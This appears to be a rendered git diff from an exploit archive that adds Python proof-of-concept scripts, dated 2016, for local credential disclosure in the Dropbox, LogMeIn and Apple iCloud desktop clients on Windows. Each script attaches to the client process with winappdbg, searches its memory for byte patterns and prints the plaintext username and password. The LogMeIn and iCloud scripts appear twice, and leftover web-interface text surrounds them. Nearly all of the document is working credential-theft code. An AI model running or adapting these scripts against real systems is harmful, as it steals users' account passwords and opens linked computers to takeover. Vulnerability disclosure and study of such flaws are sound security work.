# Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
|
||||
# http://www.black-rose.ml
|
||||
#
|
||||
#####
|
||||
# LogMeIn Client v1.3.2462 is vulnerable to local credentials disclosure, the supplied username and password are stored in a plaintext format in memory process.
|
||||
# A potential attacker could reveal the supplied username and password in order to gain access to account and associated computers.
|
||||
#####
|
||||
# Proof-Of-Concept Code:
|
||||
|
||||
import time
|
||||
import urllib
|
||||
from winappdbg import Debug, Process
|
||||
|
||||
username = ''
|
||||
password = ''
|
||||
found = 0
|
||||
filename = "LMIIgnition.exe"
|
||||
process_pid = 0
|
||||
memory_dump = []
|
||||
|
||||
debug = Debug()
|
||||
try:
|
||||
print "[~] Searching for pid by process name '%s'.." % (filename)
|
||||
time.sleep(1)
|
||||
debug.system.scan_processes()
|
||||
for (process, process_name) in debug.system.find_processes_by_filename(filename):
|
||||
process_pid = process.get_pid()
|
||||
if process_pid is not 0:
|
||||
print "[+] Found process with pid #%d" % (process_pid)
|
||||
time.sleep(1)
|
||||
print "[~] Trying to read memory for pid #%d" % (process_pid)
|
||||
|
||||
process = Process(process_pid)
|
||||
for address in process.search_bytes('\x26\x5F\x5F\x56\x49\x45\x57\x53\x54\x41\x54\x45\x3D'):
|
||||
memory_dump.append(process.read(address,150))
|
||||
for i in range(len(memory_dump[0])):
|
||||
email_addr = memory_dump[i].split('email=')[1]
|
||||
tmp_passwd = memory_dump[i].split('password=')[1]
|
||||
username = email_addr.split('&hiddenEmail=')[0]
|
||||
password = tmp_passwd.split('&rememberMe=')[0]
|
||||
if username != '' and password !='':
|
||||
found = 1
|
||||
print "[+] Credentials found!\r\n----------------------------------------"
|
||||
print "[+] Username: %s" % urllib.unquote_plus(username)
|
||||
print "[+] Password: %s" % password
|
||||
break
|
||||
if found == 0:
|
||||
print "[-] Credentials not found! Make sure the client is connected."
|
||||
else:
|
||||
print "[-] No process found with name '%s'." % (filename)
|
||||
|
||||
debug.loop()
|
||||
finally:
|
||||
debug.stop()
|
||||
|
||||
|
||||
|
||||
######################################################################
|
||||
|
||||
#####
|
||||
# Apple iCloud Desktop Client v5.2.1.0 Local Credentials Disclosure After Sign Out Exploit
|
||||
# Tested on Windows Windows 7 64bit, English
|
||||
# Vendor Homepage @ https://www.apple.com/
|
||||
# Product Homepage @ https://support.apple.com/en-us/HT204283
|
||||
# Date 07/09/2016
|
||||
# Bug Discovery by:
|
||||
#
|
||||
# Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
|
||||
# http://www.black-rose.ml
|
||||
#
|
||||
# Viktor Minin (https://www.linkedin.com/in/MininViktor)
|
||||
# https://1-33-7.com/
|
||||
#
|
||||
# Alexander Korznikov (https://www.linkedin.com/in/nopernik)
|
||||
# http://korznikov.com/
|
||||
#
|
||||
#####
|
||||
# Apple iCloud Desktop Client v5.2.1.0 is vulnerable to local credentials disclosure after the user is logged out.
|
||||
# It seems that iCloud does not store the supplied credentials while the user is logged in, but after sign out the supplied username and password are stored in a plaintext format in memory process.
|
||||
# Funny eh?!
|
||||
# A potential attacker could reveal the supplied username and password in order to gain access to iCloud account.
|
||||
#
|
||||
# Authors are not responsible for any misuse or demage which caused by use of this script code.
|
||||
# Please use responsibly.
|
||||
#####
|
||||
# Proof-Of-Concept Code:
|
||||
|
||||
import time
|
||||
import urllib
|
||||
from winappdbg import Debug, Process
|
||||
|
||||
def b2h(str):
|
||||
return ''.join(["%02X " % ord(x) for x in str]).strip()
|
||||
|
||||
def h2b(str):
|
||||
bytes = []
|
||||
str = ''.join(str.split(" "))
|
||||
for i in range(0, len(str), 2):
|
||||
bytes.append(chr(int(str[i:i+2], 16)))
|
||||
return ''.join(bytes)
|
||||
|
||||
usr = ''
|
||||
pwd = ''
|
||||
found = 0
|
||||
filename = "iCloud.exe"
|
||||
process_pid = 0
|
||||
memory_dump = []
|
||||
|
||||
debug = Debug()
|
||||
try:
|
||||
print "#########################################################################"
|
||||
print "#\tApple iCloud v5.2.1.0 Local Credentials Disclosure Exploit\t#"
|
||||
print "# Bug Discovery by Yakir Wizman, Victor Minin, Alexander Korznikov\t#"
|
||||
print "#\t\tTested on Windows Windows 7 64bit, English\t\t#"
|
||||
print "#\t\t\tPlease use responsibly.\t\t\t\t#"
|
||||
print "#########################################################################\r\n"
|
||||
print "[~] Searching for pid by process name '%s'.." % (filename)
|
||||
time.sleep(1)
|
||||
debug.system.scan_processes()
|
||||
for (process, process_name) in debug.system.find_processes_by_filename(filename):
|
||||
process_pid = process.get_pid()
|
||||
if process_pid is not 0:
|
||||
print "[+] Found process with pid #%d" % (process_pid)
|
||||
time.sleep(1)
|
||||
print "[~] Trying to read memory for pid #%d" % (process_pid)
|
||||
|
||||
process = Process(process_pid)
|
||||
for address in process.search_bytes('\x88\x38\xB7\xAE\x73\x8C\x07\x00\x0A\x16'):
|
||||
memory_dump.append(process.read(address,50))
|
||||
|
||||
try:
|
||||
str = b2h(memory_dump[0]).split('88 38 B7 AE 73 8C 07 00 0A 16')[1]
|
||||
usr = h2b(str.split(' 00')[0])
|
||||
except:
|
||||
pass
|
||||
|
||||
memory_dump = []
|
||||
for address in process.search_bytes('\x65\x00\x88\x38\xB7\xAE\x73\x8C\x07\x00\x02\x09'):
|
||||
memory_dump.append(process.read(address,60))
|
||||
try:
|
||||
str = b2h(memory_dump[0]).split('07 00 02 09')[1]
|
||||
pwd = h2b(str.split(' 00')[0])
|
||||
except:
|
||||
pass
|
||||
|
||||
if usr != '' and pwd !='':
|
||||
found = 1
|
||||
print "[+] iCloud Credentials found!\r\n----------------------------------------"
|
||||
print "[+] Username: %s" % usr
|
||||
print "[+] Password: %s" % pwd
|
||||
if found == 0:
|
||||
print "[-] Credentials not found!"
|
||||
else:
|
||||
print "[-] No process found with name '%s'." % (filename)
|
||||
|
||||
debug.loop()
|
||||
finally:
|
||||
debug.stop()
|
66
platforms/windows/local/40348.py
Executable file
66
platforms/windows/local/40348.py
Executable file
|
@ -0,0 +1,66 @@
|
|||
#####
|
||||
# Dropbox Desktop Client v9.4.49 (64bit) Local Credentials Disclosure
|
||||
# Tested on Windows Windows Server 2012 R2 64bit, English
|
||||
# Vendor Homepage @ https://www.dropbox.com
|
||||
# Date 06/09/2016
|
||||
# Bug Discovery by:
|
||||
#
|
||||
# Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
|
||||
# http://www.black-rose.ml
|
||||
#
|
||||
# Viktor Minin (https://www.linkedin.com/in/MininViktor)
|
||||
# https://1-33-7.com/
|
||||
#
|
||||
# Alexander Korznikov (https://www.linkedin.com/in/nopernik)
|
||||
# http://korznikov.com/
|
||||
#
|
||||
#####
|
||||
# Dropbox Desktop Client v9.4.49 is vulnerable to local credentials disclosure, the supplied username and password are stored in a plaintext format in memory process.
|
||||
# A potential attacker could reveal the supplied username and password in order to gain access to account.
|
||||
#####
|
||||
# Proof-Of-Concept Code:
|
||||
|
||||
import time
|
||||
import urllib
|
||||
from winappdbg import Debug, Process
|
||||
|
||||
username = ''
|
||||
password = ''
|
||||
found = 0
|
||||
filename = "Dropbox.exe"
|
||||
process_pid = 0
|
||||
memory_dump = []
|
||||
|
||||
debug = Debug()
|
||||
try:
|
||||
print "[~] Searching for pid by process name '%s'.." % (filename)
|
||||
time.sleep(1)
|
||||
debug.system.scan_processes()
|
||||
for (process, process_name) in debug.system.find_processes_by_filename(filename):
|
||||
process_pid = process.get_pid()
|
||||
if process_pid is not 0:
|
||||
print "[+] Found process with pid #%d" % (process_pid)
|
||||
time.sleep(1)
|
||||
print "[~] Trying to read memory for pid #%d" % (process_pid)
|
||||
|
||||
process = Process(process_pid)
|
||||
for address in process.search_bytes('\x26\x70\x61\x73\x73\x77\x6F\x72\x64\x3D'):
|
||||
memory_dump.append(process.read(address,100))
|
||||
for i in range(len(memory_dump)):
|
||||
email_addr = memory_dump[i].split('email=')[1]
|
||||
tmp_passwd = memory_dump[i].split('password=')[1]
|
||||
username = email_addr.split('\x00')[0]
|
||||
password = tmp_passwd.split('&is_sso_link=')[0]
|
||||
if username != '' and password !='':
|
||||
found = 1
|
||||
print "[+] Credentials found!\r\n----------------------------------------"
|
||||
print "[+] Username: %s" % urllib.unquote_plus(username)
|
||||
print "[+] Password: %s" % password
|
||||
if found == 0:
|
||||
print "[-] Credentials not found! Make sure the client is connected."
|
||||
else:
|
||||
print "[-] No process found with name '%s'." % (filename)
|
||||
|
||||
debug.loop()
|
||||
finally:
|
||||
debug.stop()
|
67
platforms/windows/local/40349.py
Executable file
67
platforms/windows/local/40349.py
Executable file
|
@ -0,0 +1,67 @@
|
|||
#####
|
||||
# LogMeIn Client v1.3.2462 (64bit) Local Credentials Disclosure
|
||||
# Tested on Windows Windows Server 2012 R2 64bit, English
|
||||
# Vendor Homepage @ https://secure.logmein.com/home/en
|
||||
# Date 06/09/2016
|
||||
# Bug Discovery by:
|
||||
#
|
||||
# Alexander Korznikov (https://www.linkedin.com/in/nopernik)
|
||||
# http://korznikov.com/
|
||||
#
|
||||
# Viktor Minin (https://www.linkedin.com/in/MininViktor)
|
||||
# https://1-33-7.com/
|
||||
#
|
||||
# Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
|
||||
# http://www.black-rose.ml
|
||||
#
|
||||
#####
|
||||
# LogMeIn Client v1.3.2462 is vulnerable to local credentials disclosure, the supplied username and password are stored in a plaintext format in memory process.
|
||||
# A potential attacker could reveal the supplied username and password in order to gain access to account and associated computers.
|
||||
#####
|
||||
# Proof-Of-Concept Code:
|
||||
|
||||
import time
|
||||
import urllib
|
||||
from winappdbg import Debug, Process
|
||||
|
||||
username = ''
|
||||
password = ''
|
||||
found = 0
|
||||
filename = "LMIIgnition.exe"
|
||||
process_pid = 0
|
||||
memory_dump = []
|
||||
|
||||
debug = Debug()
|
||||
try:
|
||||
print "[~] Searching for pid by process name '%s'.." % (filename)
|
||||
time.sleep(1)
|
||||
debug.system.scan_processes()
|
||||
for (process, process_name) in debug.system.find_processes_by_filename(filename):
|
||||
process_pid = process.get_pid()
|
||||
if process_pid is not 0:
|
||||
print "[+] Found process with pid #%d" % (process_pid)
|
||||
time.sleep(1)
|
||||
print "[~] Trying to read memory for pid #%d" % (process_pid)
|
||||
|
||||
process = Process(process_pid)
|
||||
for address in process.search_bytes('\x26\x5F\x5F\x56\x49\x45\x57\x53\x54\x41\x54\x45\x3D'):
|
||||
memory_dump.append(process.read(address,150))
|
||||
for i in range(len(memory_dump[0])):
|
||||
email_addr = memory_dump[i].split('email=')[1]
|
||||
tmp_passwd = memory_dump[i].split('password=')[1]
|
||||
username = email_addr.split('&hiddenEmail=')[0]
|
||||
password = tmp_passwd.split('&rememberMe=')[0]
|
||||
if username != '' and password !='':
|
||||
found = 1
|
||||
print "[+] Credentials found!\r\n----------------------------------------"
|
||||
print "[+] Username: %s" % urllib.unquote_plus(username)
|
||||
print "[+] Password: %s" % password
|
||||
break
|
||||
if found == 0:
|
||||
print "[-] Credentials not found! Make sure the client is connected."
|
||||
else:
|
||||
print "[-] No process found with name '%s'." % (filename)
|
||||
|
||||
debug.loop()
|
||||
finally:
|
||||
debug.stop()
|
99
platforms/windows/local/40350.py
Executable file
99
platforms/windows/local/40350.py
Executable file
|
@ -0,0 +1,99 @@
|
|||
#####
|
||||
# Apple iCloud Desktop Client v5.2.1.0 Local Credentials Disclosure After Sign Out Exploit
|
||||
# Tested on Windows Windows 7 64bit, English
|
||||
# Vendor Homepage @ https://www.apple.com/
|
||||
# Product Homepage @ https://support.apple.com/en-us/HT204283
|
||||
# Date 07/09/2016
|
||||
# Bug Discovery by:
|
||||
#
|
||||
# Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
|
||||
# http://www.black-rose.ml
|
||||
#
|
||||
# Viktor Minin (https://www.linkedin.com/in/MininViktor)
|
||||
# https://1-33-7.com/
|
||||
#
|
||||
# Alexander Korznikov (https://www.linkedin.com/in/nopernik)
|
||||
# http://korznikov.com/
|
||||
#
|
||||
#####
|
||||
# Apple iCloud Desktop Client v5.2.1.0 is vulnerable to local credentials disclosure after the user is logged out.
|
||||
# It seems that iCloud does not store the supplied credentials while the user is logged in, but after sign out the supplied username and password are stored in a plaintext format in memory process.
|
||||
# Funny eh?!
|
||||
# A potential attacker could reveal the supplied username and password in order to gain access to iCloud account.
|
||||
#
|
||||
# Authors are not responsible for any misuse or demage which caused by use of this script code.
|
||||
# Please use responsibly.
|
||||
#####
|
||||
# Proof-Of-Concept Code:
|
||||
|
||||
import time
|
||||
import urllib
|
||||
from winappdbg import Debug, Process
|
||||
|
||||
def b2h(str):
|
||||
return ''.join(["%02X " % ord(x) for x in str]).strip()
|
||||
|
||||
def h2b(str):
|
||||
bytes = []
|
||||
str = ''.join(str.split(" "))
|
||||
for i in range(0, len(str), 2):
|
||||
bytes.append(chr(int(str[i:i+2], 16)))
|
||||
return ''.join(bytes)
|
||||
|
||||
usr = ''
|
||||
pwd = ''
|
||||
found = 0
|
||||
filename = "iCloud.exe"
|
||||
process_pid = 0
|
||||
memory_dump = []
|
||||
|
||||
debug = Debug()
|
||||
try:
|
||||
print "#########################################################################"
|
||||
print "#\tApple iCloud v5.2.1.0 Local Credentials Disclosure Exploit\t#"
|
||||
print "# Bug Discovery by Yakir Wizman, Victor Minin, Alexander Korznikov\t#"
|
||||
print "#\t\tTested on Windows Windows 7 64bit, English\t\t#"
|
||||
print "#\t\t\tPlease use responsibly.\t\t\t\t#"
|
||||
print "#########################################################################\r\n"
|
||||
print "[~] Searching for pid by process name '%s'.." % (filename)
|
||||
time.sleep(1)
|
||||
debug.system.scan_processes()
|
||||
for (process, process_name) in debug.system.find_processes_by_filename(filename):
|
||||
process_pid = process.get_pid()
|
||||
if process_pid is not 0:
|
||||
print "[+] Found process with pid #%d" % (process_pid)
|
||||
time.sleep(1)
|
||||
print "[~] Trying to read memory for pid #%d" % (process_pid)
|
||||
|
||||
process = Process(process_pid)
|
||||
for address in process.search_bytes('\x88\x38\xB7\xAE\x73\x8C\x07\x00\x0A\x16'):
|
||||
memory_dump.append(process.read(address,50))
|
||||
|
||||
try:
|
||||
str = b2h(memory_dump[0]).split('88 38 B7 AE 73 8C 07 00 0A 16')[1]
|
||||
usr = h2b(str.split(' 00')[0])
|
||||
except:
|
||||
pass
|
||||
|
||||
memory_dump = []
|
||||
for address in process.search_bytes('\x65\x00\x88\x38\xB7\xAE\x73\x8C\x07\x00\x02\x09'):
|
||||
memory_dump.append(process.read(address,60))
|
||||
try:
|
||||
str = b2h(memory_dump[0]).split('07 00 02 09')[1]
|
||||
pwd = h2b(str.split(' 00')[0])
|
||||
except:
|
||||
pass
|
||||
|
||||
if usr != '' and pwd !='':
|
||||
found = 1
|
||||
print "[+] iCloud Credentials found!\r\n----------------------------------------"
|
||||
print "[+] Username: %s" % usr
|
||||
print "[+] Password: %s" % pwd
|
||||
if found == 0:
|
||||
print "[-] Credentials not found!"
|
||||
else:
|
||||
print "[-] No process found with name '%s'." % (filename)
|
||||
|
||||
debug.loop()
|
||||
finally:
|
||||
debug.stop()
|
Loading…
Add table
Reference in a new issue